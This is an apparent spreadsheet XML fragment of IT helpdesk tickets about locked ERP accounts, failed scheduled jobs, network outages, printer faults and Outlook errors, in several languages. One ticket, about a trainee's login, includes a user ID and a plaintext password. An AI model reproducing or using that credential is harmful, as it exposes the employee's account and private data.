    <s v="jvxtfhkg heptuizn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp- gesperrt fehlversuche kennwort gesperrt"/>
    <s v="bitte erp freischalten fehlversuche"/>
    <s v="tgpvrbyi ztdxwpcn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password is not synchronized."/>
    <s v="password is not synchronized."/>
    <s v="airhfgen ynsjogui"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pc der maschine r45 defekt"/>
    <s v="pc der maschine r45 fÃ¤hrt nicht mehr hoch."/>
    <s v="baygwijr lavxwkfc"/>
    <x v="32"/>
  </r>
  <r>
    <s v="pc awywx00067004 in rddept qlhmawgi sgwipoxn is not getting network connection"/>
    <s v="pc awywx00067004 in rddept qlhmawgi sgwipoxn is not getting network connection"/>
    <s v="uaclgmeq hyxzmwdi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="call from salesforce for hathryrtmut"/>
    <s v="caller named benjamtrhdyin from salesforce wanted to talk to hathryrtmut"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bug in employee extract programdnty - reportncqulao qauighdpnager is appearing blank."/>
    <s v="bug in employee extract programdnty - reportncqulao qauighdpnager is appearing blank."/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="9"/>
  </r>
  <r>
    <s v="EU_tool in germany steel ohne funktion - rÃ¼ckmelden geht nicht!!!!"/>
    <s v="EU_tool in germany steel ohne funktion - rÃ¼ckmelden geht nicht!!!!"/>
    <s v="rvdtagmf klbnhydo"/>
    <x v="25"/>
  </r>
  <r>
    <s v="job Job_579 failed in job_scheduler at: 10/24/2016 05:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_579 failed in job_scheduler at: 10/24/2016 05:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="lxgtvwyh jnkchfap"/>
    <x v="0"/>
  </r>
  <r>
    <s v="msd crm error opening outlook"/>
    <s v="hello_x000d__x000a_when open outlook crm goes on erro with .net and if i press continue i can work with outlook but not with crm plug-in._x000d__x000a_otherwise outlook crash."/>
    <s v="rcdanwut kzbfstxm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wk38 - qdxyifhj zbwtunpy"/>
    <s v="hallo, kannst du einmal nachsehen, wo der e-mail button ist am drucker. er ist weg! :-) danke. uwe"/>
    <s v="qmwhlnev ixtmkwdc"/>
    <x v="32"/>
  </r>
  <r>
    <s v="hi, few users are not able to logon to crm website."/>
    <s v="link : _x000a_users:_x000a_ottyhddok_x000a_thielpwii2e_x000a_lobodeid2d_x000a_loksdkdjwda_x000a__x000a_please get in touch with them"/>
    <s v="hadbkvwt touedfyr"/>
    <x v="32"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="jtboznci fiormedp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="activation of outlook email access on samsung s7 edge device for nzuofeam exszgtwd"/>
    <s v="_x000a__x000a_received from: kbclinop.vsczklfp@gmail.com_x000a__x000a_hi,_x000a_please usa email access on new samsung s7 device for nzuofeam exszgtwd  (md apac &amp; vp cpmmecial).  please find information as follow :_x000a__x000a_email: gjbcengineering_tooll.gidsekfo@gmail.com_x000a_manager's name : chucashadqc wsljdqqds_x000a__x000a_is this a replacement of your old device?  yes, as the existing old samsung s5 phone is no longer in use.  please remove access on the old samsung s5 device._x000a__x000a_"/>
    <s v="kbclinop vsczklfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit bluescreen "/>
    <s v="hallo ,_x000a__x000a_gerade eben ist der computer an meinem arbeitsplatz zum wiederholten male ausgestiegen und hat lediglich einen blauen bildschirm mit weiÃŸer schrift dargestellt._x000a__x000a_bitte schau dir das vor ort mal an._x000a__x000a_"/>
    <s v="vrfpyjwi nzhvgqiw"/>
    <x v="24"/>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mtcywlxv cklzmxyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no display on desk phone."/>
    <s v="no display on desk phone."/>
    <s v="jctnelqs lansuiwe"/>
    <x v="32"/>
  </r>
  <r>
    <s v="probleme mit lan fÃ¼r rechner erodiermaschine\ dtlmbcrx mwuateyx"/>
    <s v="probleme mit lan fÃ¼r rechner erodiermaschine\ dtlmbcrx mwuateyx"/>
    <s v="dtlmbcrx mwuateyx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="network outage: south amerirtca -(rrc) network company-sa-south amerirtca-dmvpn-1811-router) is down since 3:53am on 10/24/16, no backup circuit"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________3:53am on 10/24/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_no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EU_tool is hanging and slow at the loaction."/>
    <s v="EU_tool is hanging and slow at the loaction._x000a_"/>
    <s v="vaqsmniw dtgnkzvp"/>
    <x v="25"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/24/2016 04:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/24/2016 04:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="german workflow objects from all folders are gone :de_industrial - 01, gen ing, transportation 1/2, ici"/>
    <s v="german workflow objects from all folders are gone :de_industrial - 01, gen ing, transportation 1/2, ici. in the morning there were approximately 20 objects.. please check also the uk folder. "/>
    <s v="mcytlpva jutxbdor"/>
    <x v="12"/>
  </r>
  <r>
    <s v="problem with outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rjsulvat.uanigkqc@gmail.com_x000d__x000a__x000d__x000a_hello._x000d__x000a__x000d__x000a_i cannot start outlook_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="rjsulvat uanigkqc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="netzlaufwerke auf auf quattro-4206, quattro-4201, quattro-4204 seit sonntag nicht verbunden."/>
    <s v="netzlaufwerke auf auf quattro-4206, quattro-4201, quattro-4204 seit sonntag nicht verbunden."/>
    <s v="nbfyzlgu sdjtiqzv"/>
    <x v="41"/>
  </r>
  <r>
    <s v="password reset - vvjotsgssea"/>
    <s v="password reset - vvjotsgssea"/>
    <s v="jwoiyzfp zlftrkpq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze chat"/>
    <s v="uacyltoe hxgaycze chat"/>
    <s v="urvitans laqdwvgo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mount request on lib6 prod weekly for job backup_tool-HostName_1048-weekly2"/>
    <s v="mount request on lib6 prod weekly for job backup_tool-HostName_1048-weekly2"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>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wzkaptfd axqsyrem"/>
    <x v="0"/>
  </r>
  <r>
    <s v="employee owned mobility agreement"/>
    <s v="employee owned mobility agreement-"/>
    <s v="mcysxfjw pcrdoewx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="chat feature for german language is not working"/>
    <s v="please check if this is related to the change in name of the telephony_software queues from fdrf to germany._x000d__x000a_please check the attached error._x000d__x000a_chat url - _x000d__x000a_english language chat works normally."/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="6"/>
  </r>
  <r>
    <s v="job Job_485 failed in job_scheduler at: 10/24/2016 02:47:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_485 failed in job_scheduler at: 10/24/2016 02:47:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1390 failed in job_scheduler at: 10/24/2016 02:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1390 failed in job_scheduler at: 10/24/2016 02:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1338 failed in job_scheduler at: 10/24/2016 02:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1338 failed in job_scheduler at: 10/24/2016 02:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="material type &quot;nd&quot;  doesn Â´t create any requriment  for the zlz agreements orders "/>
    <s v="_x000d__x000a__x000d__x000a_received from: qbewrpfu.lwibmxzo@gmail.com_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="qbewrpfu lwibmxzo"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job Job_487 failed in job_scheduler at: 10/24/2016 02:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_487 failed in job_scheduler at: 10/24/2016 02:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="passwort change failed"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ovnedzxg.pylshdvb@gmail.com_x000d__x000a__x000d__x000a_dear sir or madam,_x000d__x000a__x000d__x000a_while changing my password through the password_management_tool password manager, following issue occured:_x000d__x000a__x000d__x000a_[cid:image001.png@01d22dcd.0a760ce0]_x000d__x000a__x000d__x000a_for the erp hcm production target it was not able to change the password. details say &quot;please contact your helpdesk&quot;._x000d__x000a__x000d__x000a_many "/>
    <s v="ovnedzxg pylshdvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="etiketten drucker im bereich endkontrolle germany defekt"/>
    <s v="funktionsstÃ¶rung"/>
    <s v="tzmewbdv zjbuwmkn"/>
    <x v="32"/>
  </r>
  <r>
    <s v="on;ly for uacyltoe hxgayczeing - sn "/>
    <s v="on;ly for uacyltoe hxgayczeing - sn "/>
    <s v="ginjmaxk zumkvfeb"/>
    <x v="35"/>
  </r>
  <r>
    <s v="drucker  wk1678"/>
    <s v="_x000a__x000a_received from: inqogkxz.rgmslhjn@gmail.com_x000a__x000a_hallo help,_x000a_drucker wk1678 funktioniert nicht mehr richtig._x000a_etiketten verschieben sich._x000a_bitte herrn himghtmelreich informieren._x000a_vielen dank_x000a__x000a__x000a__x000a_best "/>
    <s v="inqogkxz rgmslhjn"/>
    <x v="32"/>
  </r>
  <r>
    <s v="job Job_1854 failed in job_scheduler at: 10/24/2016 01:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1854 failed in job_scheduler at: 10/24/2016 01:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_2589 failed in job_scheduler at: 10/24/2016 01:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2589 failed in job_scheduler at: 10/24/2016 01:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="area code routing check for machine line"/>
    <s v="the following area codes  below are being routed from our line to tyuhfljp zyjfpgtk when someone calls the help desk line.   they should be routed to lewbzysd gqdaikbv.   can you please check the routing?_x000a__x000a_area codes_x000a_41867_x000a_70567_x000a_51967_x000a__x000a_group 5 - dnis 5849_x000a_"/>
    <s v="rwmeuzvy bpstvajw"/>
    <x v="6"/>
  </r>
  <r>
    <s v="engineering tool login issue."/>
    <s v="engineering tool login issue._x000d__x000a_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seutrkhn jvdtilek"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: - india () since sunday (oct 23rd):telecom_vendor_1 sr:25182480 "/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________oct 23rd___________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __na_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? __na_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ________     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ____na___     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ____telecom_vendor_1:25182480 _____________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ____yes____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze ticket"/>
    <s v="uacyltoe hxgaycze ticket"/>
    <s v="pxsghrjd wiehqmka"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login not possible for trail employee thsaqsh 767202934"/>
    <s v="_x000a__x000a_received from: jhyazros.azdxonjg@gmail.com_x000a__x000a_hello_x000a_following  trail employee working in pthyu5 is unable to login his company hub mail id to view salary slip. request to rectify the same aerp_x000a_name: thsaqsh _x000a_i number: 767202934_x000a_mail id: hjsastadad.kjddwdd2@company.com&lt;mailto:hjsastadad.kjddwdd2@company.com&gt;_x000a_user id: wshqqhdqh_x000a_password:vasanqi7892016_x000a__x000a_"/>
    <s v="jhyazros azdxonjg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlookæ‰“ä¸å¼€"/>
    <s v="æ‰“å¼€outlookæ—¶ï¼Œæ˜¾ç¤ºoutlook.ostæ–‡ä»¶é”™è¯¯ï¼Œç¨‹åºè‡ªåŠ¨å…³é—­ã€‚"/>
    <s v="qayozbcd vwglmpjq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage:india  plant primary telecom_vendor_1 circuit is down since 12:11 am on 10/24 et,site up on secondary telecom_vendor_3"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __yes_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______12:11 am on 10/24 et,________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____na___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ____yes__    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _____yes___     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___na______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ______telecom_vendor_1 sr#25182415___________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="issue in wi fi  &amp; erp login"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ohdrnswl.rezuibdt@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_we are facing issue in wifi connectivity &amp; erp login._x000d__x000a__x000d__x000a_[cid:image001.png@01d22dda.2a4fa9b0]_x000d__x000a__x000d__x000a_best "/>
    <s v="ohdrnswl rezuibdt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze ignore"/>
    <s v="uacyltoe hxgaycze"/>
    <s v="jloygrwh acvztedi"/>
    <x v="35"/>
  </r>
  <r>
    <s v="we are unable to update the status in ticketing_tool tickets."/>
    <s v="_x000a__x000a_received from: tehsauadd.asjdidwni@company.com_x000a__x000a_hello,_x000a__x000a_please help us on this issue._x000a__x000a_issue: we are unable to update the status for tickets in ticketing_tool tool._x000a__x000a_below are the example tickets for your info._x000a__x000a__x000a_[cid:image001.png@01d22dd8.c4f8ef00]_x000a__x000a__x000a_[cid:image002.png@01d22dd9.123015a0]_x000a__x000a_"/>
    <s v="kmnsvzuq euyvihzc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgayczeing-please ignore"/>
    <s v="uacyltoe hxgayczeing-pls ignore"/>
    <s v="rxoluzhy pnutohms"/>
    <x v="35"/>
  </r>
  <r>
    <s v="uacyltoe hxgayczeing - please ignore"/>
    <s v="uacyltoe hxgayczeing - please ignore"/>
    <s v="zscohabw qorvugzf"/>
    <x v="35"/>
  </r>
  <r>
    <s v="excel database problem to run an automation"/>
    <s v="_x000a__x000a_received from: dwsyaqpr.bzasnmvw@gmail.com_x000a__x000a_hello,_x000a__x000a_i have developed one application which access database internally. i have already checked with few of my collogues and it's working fine._x000a_the app is made for putyrh-5 press tool team. in their machine it's not working._x000a__x000a_i have checked their system configuration as well which is same as my system._x000a__x000a_system names: awywkwd67x217842, awyl629w8911908, awywkjsw7x217842_x000a_configuration: office-2010 (64bit)_x000a__x000a_this is the error what i get in their system:_x000a_[cid:image001.png@01d22941.20a282e0]_x000a__x000a_"/>
    <s v="pchjidaq pvtxjaml"/>
    <x v="18"/>
  </r>
  <r>
    <s v="production order number issue "/>
    <s v="_x000a__x000a_received from: zuxcfonv.nyhpkrbe@gmail.com_x000a__x000a_gso,_x000a__x000a_currently erp system production order number cannot be found after order number was identify enter in shopfloor , everything is fine before erp routine maintenance , please open a ticket for escalate the responsible team , that's very urgent !_x000a__x000a_[cid:image001.jpg@01d22de9.0bb3fa60] [cid:image004.png@01d22dea.7d33a720]_x000a__x000a__x000a_best "/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="42"/>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krynlisw dqfeglkc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="office excel ,powerpoint æ‰“å¼€ä¸€äº›æ–‡ä»¶æ—¶æç¤ºé”™è¯¯ã€‚"/>
    <s v="office excel ,powerpoint æ‰“å¼€ä¸€äº›æ–‡ä»¶æ—¶æç¤ºé”™è¯¯ï¼Œç”µè„‘å’Œé‚®ä»¶é‡Œé¢ä¸€äº›æ–‡ä»¶æ— æ³•æ‰“å¼€ã€‚"/>
    <s v="hdungfsc znuhyjkx"/>
    <x v="31"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 10/23/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 10/23/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 10/23/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 10/23/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 10/23/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 10/23/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="unable to access outlook"/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi it team_x000a__x000a_kindly please assist as user tahamt unable to access outlook after he change his password._x000a__x000a_thry ldikdowdfm_x000a_operation supervisor_x000a_company distribution services of asia pte ltd_x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please delete following these session created by tomyh678oen."/>
    <s v="please delete following these session created by tomyh678oen."/>
    <s v="zsqabokr xbtsaodr"/>
    <x v="43"/>
  </r>
  <r>
    <s v="when you look up price and availability local availability is zero and you can not see the global availability"/>
    <s v="see attachment.  "/>
    <s v="qmglkaru qiwhfkdv"/>
    <x v="39"/>
  </r>
  <r>
    <s v="inquiry on impact awards"/>
    <s v="from: wauhocsk vxuikqaf _x000a_sent: sunday, october 23, 2016 9:28 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: lxrponic lyszwcxg; ranlpbmw djwkylif_x000a_subject: fw: impact awards_x000a__x000a_dear sirs_x000a__x000a_please be so kind and help. _x000a__x000a_i have been asking hr but they told me that you are the right people to talk to_x000a__x000a_there have been done change on the position of director sales theeadjjd and we_x000a__x000a_when sales managers from theeadjjd direct side are plugging in impact award points â€“ the approver is still ranlpbmw djwkylif (should be wauhocsk vxuikqaf)_x000a__x000a_and i guess same issue might be with we (wester europe (there was a change of sales director as well)_x000a__x000a_we â€“ original sd â€“ crohuani dtjvhyob_x000a_we â€“ new sd â€“ ranlpbmw djwkylif_x000a__x000a_eseer â€“ original sd â€“ ranlpbmw djwkylif_x000a_eseer â€“ new sd â€“ wauhocsk vxuikqaf_x000a__x000a_would you be so kind and help us please ?_x000a__x000a_in case you need more info â€“ let me know_x000a_"/>
    <s v="wauhocsk vxuikqaf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please provide access for mails in my mobile phone. "/>
    <s v="from: fdbgoamk hygxzklauthuchidambaramdnty _x000d__x000a_sent: sunday, october 23, 2016 10:50 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: fw: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000d__x000a__x000d__x000a_please provide access for mails in my mobile phone. _x000d__x000a__x000d__x000a_"/>
    <s v="fdbgoamk hygxzkla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkbackup_tool_csqe_dev_inc failed in job_scheduler at: 10/23/2016 18:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_csqe_dev_inc failed in job_scheduler at: 10/23/2016 18:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job bkbackup_tool_HostName_771_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_HostName_771_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_450 failed in job_scheduler at: 10/23/2016 17:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_450 failed in job_scheduler at: 10/23/2016 17:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job bkbackup_tool_HostName_768_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_HostName_768_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job bkbackup_tool_HostName_920_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_HostName_920_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_2114 failed in job_scheduler at: 10/23/2016 17:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2114 failed in job_scheduler at: 10/23/2016 17:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="interface: gigabitethernet0/2 Â· usa-2950-access-sw02 on usa-2950-core-sw02 is down since 10/23/2016 3:52 pm"/>
    <s v="interface: gigabitethernet0/2 Â· usa-2950-access-sw02 on usa-2950-core-sw02 is down since 10/23/2016 3:52 pm"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="3"/>
  </r>
  <r>
    <s v="outlook 365 "/>
    <s v="_x000a__x000a_received from: oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_my outlook 365 is not working_x000a_please see if you can fix_x000a__x000a_thsadyu dwwlhews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_504 failed in job_scheduler at: 10/23/2016 13:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_504 failed in job_scheduler at: 10/23/2016 13:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1422 failed in job_scheduler at: 10/23/2016 13:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1422 failed in job_scheduler at: 10/23/2016 13:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="HostName_587: germany server is down since 11:01 am  et on 10/23."/>
    <s v="HostName_587: germany server is down since 11:01 am  et on 10/23."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="call came and there was only music and nothing else"/>
    <s v="call came and there was only music and nothing else"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // loud noise"/>
    <s v="blank call // loud noise"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp password reset"/>
    <s v="_x000a__x000a_received from: skmdgnuh.utgclesd@gmail.com_x000a__x000a_hi,_x000a__x000a_require to reset erp password._x000a__x000a_login id:anantadth67_x000a__x000a__x000a_with warm "/>
    <s v="skmdgnuh utgclesd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call came and got disconnected"/>
    <s v="call came and got disconnected"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bwhrerattr failed in job_scheduler at: 10/23/2016 06:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrerattr failed in job_scheduler at: 10/23/2016 06:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_727 failed in job_scheduler at: 10/23/2016 02:50:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_727 failed in job_scheduler at: 10/23/2016 02:50:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_1013 does not come up after weekly reboot"/>
    <s v="HostName_1013 does not come up after weekly reboot._x000a__x000a_note that recently there was a hdd and power supply replaced on this server._x000a__x000a_c:\users\karashsnnsb&gt;ping HostName_1013_x000a__x000a_pinging HostName_1013.company.company.com [29.21.92.849] with 32 bytes of data:_x000a_request timed out._x000a_request timed out._x000a_request timed out._x000a_request timed out._x000a__x000a_ping statistics for 29.21.92.849:_x000a_    packets: sent = 4, received = 0, lost = 4 (100% loss),_x000a__x000a_c:\users\karashsnnsb&gt;_x000a__x000a__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job bk_hana_SID_22_os_wly_dp failed in job_scheduler at: 10/23/2016 01:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_22_os_wly_dp failed in job_scheduler at: 10/23/2016 01:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3097 failed in job_scheduler at: 10/23/2016 01:50:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3097 failed in job_scheduler at: 10/23/2016 01:50:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_3096 failed in job_scheduler at: 10/23/2016 00:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3096 failed in job_scheduler at: 10/23/2016 00:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_3074 failed in job_scheduler at: 10/23/2016 00:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3074 failed in job_scheduler at: 10/23/2016 00:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_3076 failed in job_scheduler at: 10/23/2016 00:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3076 failed in job_scheduler at: 10/23/2016 00:15:00"/>
